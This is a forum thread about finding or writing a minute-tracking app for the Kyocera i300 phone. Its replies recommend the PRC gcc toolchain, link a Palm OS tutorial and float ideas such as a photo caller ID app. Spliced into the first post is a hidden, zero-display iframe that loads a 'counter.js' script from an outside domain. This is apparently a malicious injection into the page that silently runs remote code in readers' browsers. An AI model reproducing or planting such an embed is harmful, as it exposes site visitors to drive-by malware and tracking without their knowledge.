Angry Minute Tracking Software

Does anyone know of any program that allows you to track minutes on the phone. I had a Kyocera QCP-6035, and there were multiple programs that kept minutes (peak vs. non-peak, etc.) I assume that no Kyocerra apps can work on the I300.

If anyone knows anything, let me know.

I have some computer science background, but zip with the Palm OS. Do you write code in C. If anyone knows of a website that can get me the basics of the Palm OS Code, I would appreciate it. I would like to try to develop some apps for the I300.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Get yourself a copy of PRC tools (gcc compiler for palm). Thats what I use. If you've got a cs background than you should be comfortable with gcc and unix makefiles.

After you have a build environment, then read this tutorial for how to write applications:

http://tangentsoft.net/palmfaq/articles/tutorial/

and I've put a little infromation about reverse engineering the i300 here:

thanks man, ponder this

Thanks alot. I follow what you say, and your code makes sense. I'm gonna start trying to figure out a minute tracking app.

I think the only thing i need is to find where the phone stores the length of time of the current phone call. That can be subtracted from either peak or off peak minutes. You set the start and end date, and number of peak and off peak minutes.

If you have any suggestions, post.

Also interested in a photo caller ID app. That shouldn't be very hard if you can modify the pointer to wherever the persons name is stored for the caller id.

any suggestions there?
